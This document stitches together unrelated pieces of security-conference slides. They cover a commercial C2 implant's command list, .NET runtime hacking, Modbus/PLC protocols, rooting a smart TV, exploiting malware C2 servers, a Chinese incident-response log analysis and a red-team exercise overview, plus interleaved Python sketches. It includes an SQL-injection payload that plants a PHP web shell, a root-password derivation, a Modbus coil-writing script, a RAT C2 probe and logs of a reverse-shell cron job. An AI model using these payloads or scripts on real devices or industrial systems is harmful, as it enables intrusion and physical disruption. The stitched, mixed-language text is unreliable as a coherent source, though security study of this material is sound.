Requires privileged badger System Enumeration v0.1 runas Runs a process as another user using domain name, username, password v0.1 shellspawn Runs a process, opens a file/video/music or other interactions using shell execution technique v0.1 screenshot Takes screenshot of the target user’s full desktop v0.3 scquery Queries windows service manager for all services v0.1 pwd Lists current directory v0.1 reg Runs registry queries without running reg.exe v0.1 mkdir Creates a directory v0.1 rm Deletes a file v0.1 rmdir Deletes a directory v0.1 ps Lists all running processes v0.1 kill Kills a process with a given process Id v0.1 cp Copies a file to a new location v0.1 mv Moves a file to a new location v0.1 change_wallpaper Changes target host’s active desktop wallpaper v0.1 download Downloads file from the target host v0.1 stop_downloads Stops all active downloads v0.1 upload Uploads a file to the target host v0.1 drivers Lists the drivers loaded on the system v0.1 idletime Gets user idletime from the host v0.1 uptime Gets the host’s uptime v0.1 lock_input Locks user’s input devices like mouse and keyboard and renders them useless until reboot v0.1 unlock_input Unlocks user’s input devices v0.1 lockws Locks user’s workstation v0.4.1 contact_harvester Extracts contacts from Outlook Address Book v0.4.1 ipstats Extracts DNS, Ipconfig and information related to network adapters v0.4.1 psgrep Subset of the ‘ps’ command. Searches for a specific process and returns basic process information v0.5 portscan Performs a TCP scan on a given host and space seperated port numbers v0.5 netshares Enumerates shares on local or a remote host. Additionally takes ‘/priv’ as an argument to check for admin privileges on the host v0.1 sleep This command changes the badger’s communication frequency to the Ratel server over a given jitter and sleep value v0.1 switch This command switches the badger’s command and control server/listener. The switch command can be highly useful when a badger has been compromised and the Red Team wants to reroute all backup badgers to a new ratel server C4 Opsec Configurations v0.1 tasks This command lists all pending tasks in the badger’s queue v0.1 exit This command kills the current badger and exits gracefully v0.1 title This command changes the title of the badger’s UI console v0.1 clrscr/cls This command clears the badger terminal screen Adhoc Commands
Attacking .NET Applications at Runtime Jon McCoy - 2010 www.DigitalBodyGuard.com What will this presentation cover? How to pWN closed-source .NET applications in new and dynamic ways New tools I am releasing Show how incredibly vulnerable .NET applications are What tools will you get? New Metasploit payload Tools to do reconnaissance, on the structure of .NET programs Beta - Decompilation Tool targeted at . NET Applications protected by wrappers/shells What will the hack do? Gain access to a target application Compromise the GUI Subvert core logic Instantiate new features Access the Object structure Connect to the Target Inject - Put your code into the target Infect - Change the target's code Exploit - Take advantage of a flaw Attack The Framework - Compromise the framework How the hack works: Overview 1. Connect to the target application -Connect With Injection 2. Access targets Object structure -Move around with Reflection 3. Modify values and/or Objects -Modify Objects with Reflection Normal Runtime Object Structure GUI Hacked Object Runtime Structure GUI Sample Code: Hack Event Reflection DEMO GUI_Spike LEET a Program VIDEO OF DEMO HACKS NOT LIVE DUE TO TIME APPLICATION Live demo Data Piggyback SQL FIN < NULL Special Thanks To Related Works of James Devlin www.codingthewheel.com Sorin Serban www.sorin.serbans.net/blog Erez Metula paper: .NET reverse engineering & .NET Framework Rootkits Thanks to assistance of Lynn Ackler Thank you for the mentorship and training in forensics. Daniel DeFreez Thank you for the help on research and vulnerability analysis (also the metasploit module) :-) Andrew Krug Thank you for the advanced IT support & shinyness. Adam REDACTED Thanks you for the IT Support; specifically hardware. License DotNetSpike and This Presentation are Licensed Under GNU General Public License - Ver. 3, 29 June 2007 This is an open source presentation presented at Defcon 18 with Tools released at Blackhat 2010 More information at: http://www.DigitalbodyGuard.com How is an attack done Connect to an Object Move Objects Change Objects Hack Events to change logic Wrap an Object to replace logic
Dam Control Substation Gas Distribution Petrochemical http://www.openplcproject.com Editor GUI Builder Raspberry Pi UniPi Linux (soft-PLC) Windows (soft- PLC) ESP8266 Arduino PiXtend FreeWave Zumlink Slave ID (1 byte) F. Code (1 byte) Data (n bytes) CRC (2 bytes) Slave ID (1 byte) F. Code (1 byte) Data (n bytes) CRC (2 bytes) Transaction ID (2 bytes) Protocol ID (2 bytes) Length (2 bytes) Unit ID (1 byte) F. Code (1 byte) Data (n bytes) Interruption Interception Modification Injection Transaction ID Protocol ID Length Unit ID Func. Code Coil Address Status Source: lirasenlared.xyz Source: lirasenlared.xyz Thiago Alves www.openplcproject.com
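The deck contrasts the Modbus RTU and Modbus TCP framings (transaction ID, protocol ID, length, unit ID, function code, coil address, status). As a concrete illustration — my own sketch, not from the slides — here is a minimal "Write Single Coil" request built to that layout; the host, port and coil address are placeholders:

import socket
import struct

def write_single_coil(host, coil_addr, on, unit_id=1, port=502):
    # Build and send a Modbus TCP "Write Single Coil" (function code 0x05) request.
    status = 0xFF00 if on else 0x0000                  # 0xFF00 = ON, 0x0000 = OFF
    pdu = struct.pack(">BHH", 0x05, coil_addr, status)
    # MBAP header: transaction id, protocol id (0), length (unit id + PDU), unit id
    mbap = struct.pack(">HHHB", 0x0001, 0x0000, len(pdu) + 1, unit_id)
    with socket.create_connection((host, port), timeout=3) as s:
        s.sendall(mbap + pdu)
        return s.recv(256)                             # a well-behaved slave echoes the request

# Example (placeholder target): write_single_coil("192.168.1.10", coil_addr=0, on=True)

Nothing in the protocol authenticates the sender, which is exactly the interception/modification/injection problem the slides point out.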
NinjaTV - Increasing Your Smart TV’s IQ Without Bricking It Felix Leder D About Myself • Passion: • Reverse Engineering (+ tool development) • Being out in the snow, being out on a bike, being out in the water • Fun Projects: • Bug hunting in malware • Botnet takeovers and countermeasure • The Honeynet Project • $$$ Job: • Mobile Threat Research @ Blue Coat Norway Credits Western Digital TV (Live Hub) Inside Motivation to get other TV stations Offline Analysis 1 Drive Investigation • WDTVPriv partition • Hauppauge TV app storage • Spotify offline storage • Last update pkg • WDTVLiveHub • Main media • Swap Offline Analysis 2 Updates Update contents felix@xxx:$ binwalk wdtvlivehub.bin DECIMAL HEX DESCRIPTION ------------------------------------------------------------------------------------ ------------------------------- 32 0x20 Squashfs filesystem, little endian, version 3.1, size: 94877984 bytes, 6913 inodes, blocksize: 131072 bytes, created: Tue Jul 16 05:17:54 2013 felix@xxx:$ binwalk wdtvlivehub.bin DECIMAL HEX DESCRIPTION ------------------------------------------------------------------------------------ ------------------------------- 32 0x20 Squashfs filesystem, little endian, version 3.1, size: 94877984 bytes, 6913 inodes, blocksize: 131072 bytes, created: Tue Jul 16 05:17:54 2013 00000000 63 34 32 63 35 34 61 63 32 66 38 33 34 32 66 66 |c42c54ac2f8342ff| 00000010 38 31 36 65 36 36 65 64 36 64 39 38 38 33 31 30 |816e66ed6d988310| 00000020 68 73 71 73 01 1b 00 00 00 00 00 00 00 00 00 00 |hsqs............| 00000030 00 00 00 00 00 00 00 00 00 00 00 00 03 00 01 00 |................| 00000040 00 00 11 00 e0 01 00 62 bb e4 51 b4 1b 06 08 01 |.......b..Q.....| 00000000 63 34 32 63 35 34 61 63 32 66 38 33 34 32 66 66 |c42c54ac2f8342ff| 00000010 38 31 36 65 36 36 65 64 36 64 39 38 38 33 31 30 |816e66ed6d988310| 00000020 68 73 71 73 01 1b 00 00 00 00 00 00 00 00 00 00 |hsqs............| 00000030 00 00 00 00 00 00 00 00 00 00 00 00 03 00 01 00 |................| 00000040 00 00 11 00 e0 01 00 62 bb e4 51 b4 1b 06 08 01 |.......b..Q.....| Firmware signatures wdtvlivehub.bin wdtvlivehub.bi2 End Signature (16 bytes) CE FA BE BA 02 00 00 00 Image I size (little endian) 00 00 00 00 Image I root Squashfs 3.1 image Start Signature (32 bytes) MD5 of Image I + end signature End Signature (32 bytes) MD5 of Image I + end signature Image II /opt Squashfs 3.1 image Signature MD5 of Image II + end signature Update contents 2 Wdtvlivehub.bin Wdtvlivehub.bi2 • /opt mounted Which way in? Vulnerability Finding Vulnerability finding SQL injection – here we come 0“; ATTACH DATABASE ‘lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘<? system($_GET[‘cmd’]); ?>’;-- 0“; ATTACH DATABASE ‘lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘<? system($_GET[‘cmd’]); ?>’;-- Vulnerability finding RFI – remote file inclusion E Where to place my PHP shell? 
Investigating more files: • /tmp/media/usb/Local/WDTV LiveHub/ is root of SMB share • So my videos are in /tmp/media/usb/Local/WDTV LiveHub/Videos/ M That was only the beginning… Webserver running as root = w00t O Must remember low hanging fruits… /opt/webserver/htdocs # ls -l … -rw-rw-r-- 1 1007 1007 1685 Jun 24 2013 system_password.php -rw-rw-r-- 1 1007 1007 142 Jun 24 2013 test.php drwxrwxr-x 3 1007 1007 21 Jul 16 2013 tmp lrwxrwxrwx 1 1007 1007 32 Dec 12 08:15 user -> /tmp/media/usb/Local/WDTVLiveHub drwxrwxr-x 8 1007 1007 298 Jul 16 2013 wd_nas drwxrwxr-x 3 1007 1007 23 Jul 16 2013 wdtvlivehub drwxrwxr-x 2 1007 1007 102 Jul 16 2013 whatson Approach for HW hackers Looking for interesting pins D Booting up End of boot 41fa4f6ac0b8ebdefb89d443cb6c5ece login: • What is the password? Reverse Engineering the boot process (parts of it) • Password is set by a tool called gbus_read_serial_num • Located in /usr/local/sbin (encrypted file system image) • Original: /home/file AES encrypted • AES key to mount this image retrieved from ROM during boot • Not visible in raw update bins gbus_read_bin_to_file 0x61d00 0x280 /tmp/xosinfo && genxenv2 g /tmp/xosinfo bc01 \ | sed 's/.*.bc01\(.*\)/\1/g' | sed 's/\ //g' > /tmp/log1 2>&1 echo `cat /tmp/log1` | mymount /home/file /usr/local/sbin -oencryption=aes -p 0 Visual AES Key What’s the root password? • RE gbus_read_serial_num echo $SERIALNUMBER | md5sum 41fa4f6ac0b8ebdefb89d443cb6c5ece login: root Password: <MD5SUM_OF_^^> BusyBox v1.10.0 (2013-06-21 20:40:53 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. # E Where are the Apps? Many traces on disk • Logos for all services • Libraries and DRM files for some • Spotify • Netflix • … • NO Apps for e.g. redbull.tv, AOL, Bild.de DMAOSD – the heart of WD TV • Last process started • System automatically reboots after process dies (e.g. is killed) • Located in the encrypted partition • Uses 75% of available RAM Services M Service details • On first connection WD TV uses GeoIP to determine country • Some services are country specific (e.g. bild.de, ivi.ru) • Pure web-pages • Others use pipes to connect to local binaries/libraries (e.g. spotify) • Crazy jump tables and if- statements O Dmaosd – all in one • 13 MB (huuge executable for MIPS – even for x86) • Everything statically linked in • QT webbrowser to access the web “services” • Libraries for HDMI and codec chips • Auto-mounts attached USB sticks, built-in harddrive • Controls network shares • Update daemon • Renderer for XML based menus • Loads all resources (templates, pictures, …) into it’s process space Debugging Dmaosd live – get GDB up Step 1: GDBServer on device • Compile chain for MIPS create GDBServer • http://www.mentor.com/embedded-software/sourcery-tools/sourcery- codebench/overview/ • LSB, software floating point, shared libraries (COMPILKIND=glibc,softfloat mipsel-linux-gcc -o test.mips test.c) • Copy GDBServer executable on device Debugging Dmaosd– attach IDA Pro • IDA Pro for remote debugging (alternatively MIPS gdb) • Very sensitive / unreliable • Don’t be fooled by pipelining in assembly • You cannot break much ☺ (more on that later) This is executed D Tatort How to get my own services on the box? 
Broadcaster “Das Erste” live stream Browser – lowest hanging fruit • QT embedded browser started • Run – time patch the urls • Windows: OpenProcess, WriteProcessMemory • Linux: ptrace • PTRACE_ATTACH to process • PTRACE_PEEKDATA to search • PTRACE_POKEDATA to overwrite (in place – size limit) http://www.redbull.tv http://www.cnn.com D Supported (HW) codecs? TV station codec has to fit NPPVpluginDescriptionString The <a href="http://www.gnome.org/projects/totem/">Totem</a> 0.10.2 plugin handles video and audio streams NP_GetMIMEDescription = application/acetrax:mp4, wmv, mp3:video/x-ms- wmv;video/wmv:wmv:video/wmv;video/x-ms-asf:wmv:video/x-ms- asf;application/maxdome:mp4, wmv, mp3:video/x-ms- wmv;video/wmv:wmv:video/wmv;video/x-ms-asf:wmv:video/x-ms-asf;application/sigma:mp4, wmv, mp3:video/x-ms- wmv;audio/mp3:mp3:audio/mp3;video/mp4:mp4:video/mp4;audio/mpeg:mpg:audio/mpeg;vid eo/wmv:wmv:video/wmv;video/mpeg4:mp4:video/mpeg4;video/x-flv:flv,f4v:video/x- flv;application/x-mpegurl:m3u8:vnd.apple.mpegurl;audio/x- wav:wav:audio/wav;video/mp2t:ts:video/mp2t;application/x-netcast- av::;application/yotavideo:mp4, wmv, mp3:video/x-ms- wmv;video/wmv:wmv:video/wmv;video/x-ms-asf:wmv:video/x-ms-asf;video/vnd.ms- playready.media.pyv:pyv:video/vnd.ms-playready.media.pyv;application/nowtilus:mp4, wmv:video/x-ms-wmv;video/mpeg4:mp4:video/mpeg4 NPPVpluginDescriptionString The <a href="http://www.gnome.org/projects/totem/">Totem</a> 0.10.2 plugin handles video and audio streams NP_GetMIMEDescription = application/acetrax:mp4, wmv, mp3:video/x-ms- wmv;video/wmv:wmv:video/wmv;video/x-ms-asf:wmv:video/x-ms- asf;application/maxdome:mp4, wmv, mp3:video/x-ms- wmv;video/wmv:wmv:video/wmv;video/x-ms-asf:wmv:video/x-ms-asf;application/sigma:mp4, wmv, mp3:video/x-ms- wmv;audio/mp3:mp3:audio/mp3;video/mp4:mp4:video/mp4;audio/mpeg:mpg:audio/mpeg;vid eo/wmv:wmv:video/wmv;video/mpeg4:mp4:video/mpeg4;video/x-flv:flv,f4v:video/x- flv;application/x-mpegurl:m3u8:vnd.apple.mpegurl;audio/x- wav:wav:audio/wav;video/mp2t:ts:video/mp2t;application/x-netcast- av::;application/yotavideo:mp4, wmv, mp3:video/x-ms- wmv;video/wmv:wmv:video/wmv;video/x-ms-asf:wmv:video/x-ms-asf;video/vnd.ms- playready.media.pyv:pyv:video/vnd.ms-playready.media.pyv;application/nowtilus:mp4, wmv:video/x-ms-wmv;video/mpeg4:mp4:video/mpeg4 Finally ☺ O Root but not 0wnd ROM filesystem root but not 0wnd by me # mount ... /dev/sigmblockh on / type squashfs (ro) root ... none on /tmp type tmpfs (rw) /dev/sigmblocki on /opt type squashfs (ro) /dev/loop0 on /tmp/static_config type minix (rw) /dev/loop1 on /usr/local/sbin type romfs (ro) tmpfs on /opt/webserver/logs type tmpfs (rw) none on /lib/sigma type ramfs (rw) /dev/sda3 on /tmp/media/usb/Local/WDTVLiveHub type ufsd (rw,nls=utf8,uid=0,gid=0,fmask=0,...) # mount ... /dev/sigmblockh on / type squashfs (ro) root ... none on /tmp type tmpfs (rw) /dev/sigmblocki on /opt type squashfs (ro) /dev/loop0 on /tmp/static_config type minix (rw) /dev/loop1 on /usr/local/sbin type romfs (ro) tmpfs on /opt/webserver/logs type tmpfs (rw) none on /lib/sigma type ramfs (rw) /dev/sda3 on /tmp/media/usb/Local/WDTVLiveHub type ufsd (rw,nls=utf8,uid=0,gid=0,fmask=0,...) 
• All persistent file systems are read-only (from ROM) • All dynamic parts are copied over to /tmp (including shadow, hosts, …) • Fresh reset after reboot Root FS (ROM) Root FS (ROM) /tmp (RAM) /tmp (RAM) Copy Copy Persistence … without the risk of bricking it Patch firmware conservatively Want to avoid bricking • Use clean reset scheme • Place other tools where they can be removed externally - harddrive (just in case) • Don’t patch the main image has several integrity checks (good conditions to run into problems) • … patch as little as possible /init /init /bin/run_all /bin/run_all /bin/dmaosd.sh /bin/dmaosd.sh /opt/qt/bin/run_qt Challenge: Mount order • Dmaosd is last process started • Mounts the hard drive • Race condition: No dmaosd if run_qt blocks no hard drive block • Solution: 1. Return control and continue as background process 2. Wait for hard drive to be mounted 3. Continue booting there /init /bin/run_all /bin/dmaosd.sh /opt/qt/bin/run_qt & Where are the lawyers? GPL? Linux? … GPL Firmware • Available but … • will lose all DRM keys • Potentially WD keys • … I haven’t tried what is lost http://support.wd.com/product/download.asp?groupid=1010&sid=134&lang=en Where is the security? Conspiracy Theory • Why is WD basically leaving the device open? Outlook My situation Your options Questions?
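For reference, here is a rough Python sketch of checking the update image layout described in the "Firmware signatures" section earlier (leading 32-byte ASCII MD5, squashfs image, 16-byte end signature beginning CE FA BE BA). The field order is my reading of that diagram and may need adjusting against a real image:

import hashlib
import struct

END_SIG_MAGIC = bytes.fromhex("cefabeba")

def check_image(path):
    # Assumed layout: [32-byte ASCII MD5][squashfs image][16-byte end signature],
    # where the MD5 covers image + end signature.
    data = open(path, "rb").read()
    stated_md5 = data[:32].decode("ascii", "replace")
    assert data[32:36] == b"hsqs", "no squashfs magic at offset 0x20"

    sig_off = data.find(END_SIG_MAGIC, 32)              # locate the 16-byte end signature
    if sig_off < 0:
        raise ValueError("end signature magic not found")
    end_sig = data[sig_off:sig_off + 16]
    image_size = struct.unpack("<I", end_sig[8:12])[0]  # size field, little endian (per the slide)
    image = data[32:sig_off]

    calc = hashlib.md5(image + end_sig).hexdigest()
    print("stated :", stated_md5)
    print("calc   :", calc)
    print("size   :", image_size, "(image bytes found:", len(image), ")")

# check_image("wdtvlivehub.bin")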
Digital Vengeance Exploiting the Most Notorious C&C Toolkits @professor__plum Disclaimer The views expressed herein do not necessarily state or reflect the views of my current or former employers. I am not responsible for any use or misuse of the information provided. Implementation of the information given is at your own risk. “The malware that was used would have slipped or probably got past 90% of internet defenses that are out there today in private industry” Joseph Demarest, assistant director of the FBI’s cyber division The sophisticated attack “hackers obtained data on tens of millions of current and former customers and employees in a sophisticated attack“ Anthem “… identified an extremely sophisticated cyber attack” RSA "It is simply not possible to beat these hackers” James A. Lewis Cybersecurity Expert at Center for Strategic and International Studies (CSIS) “Government and non-government entities are under constant attack by evolving and advanced persistent threats and criminal actors. These adversaries are sophisticated, well-funded, and focused.” Office of Personnel Management "The threat is very persistent, adaptive and sophisticated – and it is here to stay,” SWIFT Hacking back 36% of BH 2012 attendees surveyed said they engaged in some form of hacking back Many feel justified in hacking back because their government isn’t doing enough to protect them The ACDC would exempt victims from hacking laws when the aim is to identify the assailant, cut off attacks or discover stolen files.  Most likely Illegal Little to no gain Much at risk Liability Reputation Productivity Escalation Hacking back Active Cyber Defense Certainty Act RAT terminology • Client • Victim • Target • C2 Server • Attacker • Victim • Adversary • Retaliator - one who returns assault in kind *icons credit Open Security Architecture Sophisticated attack hit list • Buffer overflow exploit by Andrzej Dereszowski • Follow on work by Jos Wetzels APT1 & Poison Ivy Remote file download exploit by Shawn Denbow and Jesse Hertz Follow on work by Jos Wetzels Xtreme RAT Xtreme Rat TCP connection starts with the string “myversion|3.x\r\n” C2 responds with “X\r\n” Alternatively Xtreme rat can use a fake HTTP request of the form GET /[0-9]{1,10}.functions Remote file upload Get ready to receive tool\bad.exe and save it to C:\temp\calc.exe I’m ready to receive tool\bad.exe Here is the [data] Remote file download Win.ini (Sanity check) Event logs desktop.ini %SYSTEMROOT%\repair\SAM %SYSTEMROOT%\repair\system https://attackerkb.com/Windows/blind_files PlugX / Korplug / Destory Demo Gh0st RAT Gh0st RAT Most notably identified by C2 traffic which start with the 5 byte marker “Gh0st”
 (or other 5 byte marker) 00000, 7hero, ABCDE, Adobe, ag0ft, apach, Assas, attac, B1X6Z, BEiLa, BeiJi, Blues, ByShe, cb1st, chevr, CHINA, cyl22, DrAgOn, EXXMM, Eyes1, FKJP3, FLYNN, FWAPR, FWKJG, GWRAT, Gh0st, Gi0st, GM110, GOLDt, HEART, Hello, https, HTTPS, HXWAN, Heart, httpx, IM007, ITore, kaGni, KOBBX, KrisR, light, LkxCq, LUCKK, LURK0, lvxYT, LYRAT, Level, Lover, Lyyyy, MOUSE, MYFYB, MoZhe, MyRat, Naver, NIGHT, NoNul, Origi, OXXMM, PCRat, QQ_124971919, QWPOT, Snown, SocKt, Spidern, Super, Sw@rd, Tyjhu, URATU, v2010, VGTLS, W0LFKO, Wangz, wcker, Wh0vt, whmhl, Winds, wings, World, X6M9K, X6RAT, XDAPR, xhjyk, Xjjhj, xqwf7, YANGZ “The many faces of Gh0st Rat” — Snorre Fagerland Remote file upload Give me C:\Documents\user\file.doc so I can save it to targetX\file.doc Here is the [data] so you can save it to targetX\file.doc Remote file upload Here is the [data] so you can save it to C:\…\startup\backdoor.exe DLL side load vulnerability Gh0st Server has a dependency on oledlg.dll Only imports one function #8 OleUIBusyA(int) Return 1 and all is good Exploitation Control pointer to pointer Could use a information disclose vuln (if I had one) Thus, take the lazy man’s approach and heap spray DEP would break this but it also seems to break the EXE Decode implant configs https://github.com/kevthehermit/RATDecoders Gh0st Xtreme Rat Poision Ivy DarkComet Many others Showdan Demo Post exploitation Netstat IP address of other victims May show RDP connections in (or out) Walk FS looking for other hacking tools Install persistance Install keylogger Steal credentials Thank you @professor__plum
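As a concrete takeaway from the Xtreme Rat section earlier, the two-string handshake given there ("myversion|3.x\r\n" answered by "X\r\n") is enough to fingerprint a suspected controller. A minimal sketch, using only those strings from the slides:

import socket

def probe_xtreme_rat(host, port, timeout=5):
    # Fingerprint a suspected Xtreme RAT C2 with the handshake described above.
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(b"myversion|3.6\r\n")     # any 3.x version string
            banner = s.recv(16)
    except OSError as exc:
        return "%s:%d unreachable (%s)" % (host, port, exc)
    if banner.startswith(b"X\r\n"):
        return "%s:%d answers like an Xtreme RAT C2" % (host, port)
    return "%s:%d no match (got %r)" % (host, port, banner)

# Example: print(probe_xtreme_rat("203.0.113.5", 443))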
中国网安集团·广州三零卫士 — Wu Zhibo 伍智波 (SkyMine)

① Analysis of the main Linux log types
② Analysis of the main Windows log types
③ Log analysis of a real intrusion incident
④ Attack-chain analysis of the intrusion case

① Analysis of the main Linux log types

accesslog — the access log is one of the most important log files of a web middleware. It records every request made to the web application; the main fields include source IP, request time, request method, request path, HTTP status code and request size, making it a key indicator for identifying web attacks.

192.168.97.1 - - [02/Mar/2018:02:24:16 +0800] "GET /guestbook.php HTTP/1.1" 200 831 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
192.168.97.1 - - [02/Mar/2018:02:54:28 +0800] "GET /manage/login.php?gotopage=%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20AFdY HTTP/1.1" 200 1689 "-" "sqlmap/1.2.4#stable (http://sqlmap.org)"

/var/log/secure — one of the important Linux logs. It records security information and system login activity, including SSH logins and SFTP; with this log you can audit security events such as SSH brute forcing and illegal file operations over port 22.

Mar 2 06:10:02 ubuntu sshd[4886]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.97.1 user=test
Mar 2 06:10:02 ubuntu sshd[4860]: pam_unix(sshd:session): session opened for user test by (uid=0)

Mar 2 06:15:14 ubuntu sftp-server[5181]: session opened for local user test from [192.168.97.1]
Mar 2 06:24:08 ubuntu sftp-server[5181]: open "/tmp/test.php" flags WRITE,CREATE,TRUNCATE mode 0644
Mar 2 06:24:08 ubuntu sftp-server[5181]: close "/tmp/test.php" bytes read 0 written 1486

/var/log/cron — one of the Linux system logs. It records the execution of every scheduled task, and persistence backdoors planted by an attacker during the post-exploitation phase can often be found here.

Mar 2 08:52:01 ubuntu cron[1115]: (*system*) RELOAD (/etc/crontab)
Mar 2 08:53:01 ubuntu CRON[7469]: (root) CMD (/opt/shell.elf &)

② Analysis of the main Windows log types

Security log — when analyzing security events on a Windows server, the Security log is one of the most important data sources. With it we can spot common attack types such as brute forcing of accounts over 3389 (RDP).

③ Log analysis of an intrusion at an organization

Around 08:50 on the morning of 2 March 2018, the organization was notified by its superior unit that its portal web server was continuously connecting out to TCP port 8888 of the Zhejiang IP address 110.75.192.33. Our incident response team arrived on site at about 09:40 the same morning to handle the incident.

※ In this case study the region, IPs, ports, times, URLs and other sensitive details have all been anonymized; all screenshots were reproduced in a lab environment.

After arriving on site, the incident response team quickly ran netstat -anltp | grep "110.75.192.33:8888" to locate the process making the outbound connections, found it, then used ps -aux | grep "shell.elf" to find the process path and recorded shell.elf's creation time (i.e., its upload time). shell.elf was running as root, proving the attacker had already obtained root privileges. Reverse engineering confirmed shell.elf was a Metasploit reverse-connect backdoor.

According to the notification, the connections to 110.75.192.33:8888 kept recurring, but our analysis showed shell.elf itself had no reconnect logic, so we suspected the attacker had set up a scheduled task for it — which /var/log/cron confirmed.

We then ran last to review the root user's login history and made a striking discovery: root had been logged into by the attacker between 08:17 and 08:24 that morning, for about 7 minutes. Checking /var/log/secure, we confirmed the attacker had uploaded shell.elf via SFTP.

/var/log/secure also showed that before root was successfully logged in, every account on the system with login rights had been brute-forced starting around 07:15 — with a perfectly accurate username list, not a single extra name — so we suspected /etc/passwd had already been exposed. Around 07:41 the root password was successfully brute-forced.

Since /etc/passwd had been exposed before the attacker had root's password, we inferred it had been read through some web vulnerability, so we turned to the access log. cat access.log | grep "110.75.192.33" showed that 110.75.192.33 was only a Metasploit handler and was never used to browse the site; the site was accessed from 39.128.40.187, with 204,907 requests.

Having identified the attacker's IP as 39.128.40.187, we analyzed its behaviour in the access log and spotted a suspicious GET request from that IP. Verification confirmed a remote code execution vulnerability at that location — this is where the attacker read /etc/passwd — but issuing that GET request requires access to the management backend.

Because the vulnerable endpoint lives under the manage directory, successful exploitation meant the attacker already had backend access. Continuing through the access log, we found the backend credentials had been brute-forced around 03:50, successfully (a request to the manage directory returned 200, proving the password guess worked).

At this point it was clear that the entire intrusion had started from the management backend; going further back in the log, the attacker had begun vulnerability scanning and directory brute-forcing of the site around 02:19.
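The access-log triage above — isolating one source IP, counting its requests, finding its first request and flagging scanner or backend traffic — is easy to script. A small sketch of the kind of helper that speeds this up (not part of the original write-up; the log format matches the accesslog example earlier):

import re
from collections import Counter

LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')

def triage(path, suspect_ip):
    hits, first, flagged = 0, None, Counter()
    with open(path, encoding="utf-8", errors="replace") as f:
        for line in f:
            m = LINE.match(line)
            if not m or m.group("ip") != suspect_ip:
                continue
            hits += 1
            first = first or m.group("time")            # earliest request from this IP
            if "sqlmap" in line or "/manage/" in m.group("req"):
                flagged[m.group("req")] += 1            # scanner traffic / backend access
    print("%s: %d requests, first seen %s" % (suspect_ip, hits, first))
    for req, n in flagged.most_common(10):
        print("  %6d  %s" % (n, req))

# triage("access.log", "39.128.40.187")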
④ Attack-chain analysis of the intrusion case

2018/3/2 02:13:54 — the attacker first visits the organization's website
2018/3/2 02:19:31 — the attacker starts vulnerability-scanning the site, without result
2018/3/2 03:15:44 — the attacker starts scanning the site's directories
2018/3/2 03:20:35 — the attacker discovers the backend management URL
2018/3/2 03:26:56 — the attacker starts brute-forcing the backend management password
2018/3/2 04:10:13 — the attacker logs into the management backend and starts probing it
2018/3/2 05:43:01 — the attacker finds a remote code execution vulnerability and reads /etc/passwd
2018/3/2 07:13:15 — the attacker starts brute-forcing the login-capable users over SSH
2018/3/2 07:41:25 — the attacker brute-forces the root password
2018/3/2 08:31:07 — the attacker uploads the reverse-connect trojan shell.elf via SFTP and sets up a scheduled task
2018/3/2 08:50:xx — the reverse connections from shell.elf are detected by the superior unit, and the organization is notified

Thank you!
护 网 的 起 源 和 演 变 01 未 知 攻 , 焉 知 防 02 实 战 出 真 知 03 目 录 CONTENTS 护网的起源和演 变 PART 1 护 网 的 起 源 和 演 变 — 新 形 势 下 攻 防 对 抗 法律法规 国家标准 基线检查 渗透测试 国家 层面 APT 组织型 常态化攻防演练 新的验证体系 监管要求 国际标准、规范 旧的验证体系 安全检查 漏洞扫描 思路转变 验证体系思路转变 “ 锁 盾 ” 攻 防 演 习  “Locked Shields”系列演习是北约年度例行性网络 安全演习,于2010年启动;  模式:假想国家“Berylia”;  目标:攻击模拟的海军基地、电站等关键信息基础 设施;  时长:5天;  2018年演习 ,参演人数1000,参演国家30,攻击 次数2500,虚拟系统4000个;  2019年由北约总部牵头,在爱沙尼亚和芬兰国防军、 美军欧洲司令部、韩国国家安全研究院以及西门子、 思科等科技公司的协助下开展演习。 “ 网 络 风 暴 ” 攻 防 演 习  美国国土安全部(DHS)主导,2006年开始,每2 年举行一次;  目的:侧重于考察跨国家、政府机构等针对关键基 础设施遭到网络攻击的情况下的协调应急能力(政 府-企业+各国政府) 、评估信息共享流程、加强多 国合作。  形式:60支队伍,模拟攻击关键基础设施;  时间:1周;  特色:模拟社交网络披露漏洞/物理攻击等。 护 网 的 起 源 和 演 变 — 国 外 网 络 安 全 攻 防 演 习 护 网 的 起 源 和 演 变 —“ 护 网 行 动 ” 网 络 攻 防 演 习 概述 “护网行动”网络攻防演习是由公安机关组织的,覆盖政府、能源、交通、卫生、金融、教育等 行业的集中网络攻防演练行动。  时间:2~3周 方式:组织120~130支攻击队伍,对各行业重点单位150余家目标系统进行集中攻击,检验防守 方对攻击的防护能力,以积分形式确定防守方排名。  特点:高度仿真的APT攻击,测试人员更关注权限和数据。 参演方  攻击方:由公安机关授权的国家科研机构、安全公司/团队组成;  防守方:防守企业;  指挥部:根据攻守双方报告信息,进行评分。 2019 2018 2017 2016 试点阶段 无经验,担心出 问 题 攻击思路: 传统攻击行为、互联 网突破、旁站攻击、 内网跨域…… 拓展阶段 监管利器,被监管 单 位认知不足 攻击思路: 传统攻击行为、互联网 突破、旁站攻击、内网 跨域…… 认可阶段 头部企业认可,部 分 行业开始组织演 练 攻击思路: 传统攻击行为、互联网 突破、内网跨域、邮箱 系统、免杀工具…… 普及阶段 强信息化机构,普 遍 尝试实战演练 攻击思路: 传统攻击行为、互联网突 破、内网跨域、开始使用 0Day、邮箱系统、社工 攻击、物理设备…… 2020 常态化/推广阶段 扩大演练覆盖面,向 常 态化转变 攻击思路: 传统攻击行为、互联网突 破、内网跨域、更多0Day、 邮箱系统、免杀工具、社 工攻击、物理设备…… 护 网 的 起 源 和 演 变 — “ 护 网 行 动 ” 发 展 史 护 网 的 起 源 和 演 变 — 攻 击 方 简 要 计 分 规 则 ( 参 考 ) 低 高 账号权限 主机权限 重要系统权限 权限获取 边界突破 靶标系统 逻辑隔离 物理隔离 生产网 目标系统 核心业务 核心数据 高 计分注意事项 靶标系统拿下后防守企业可能 退出演习;  单项得分和总分均有上限;  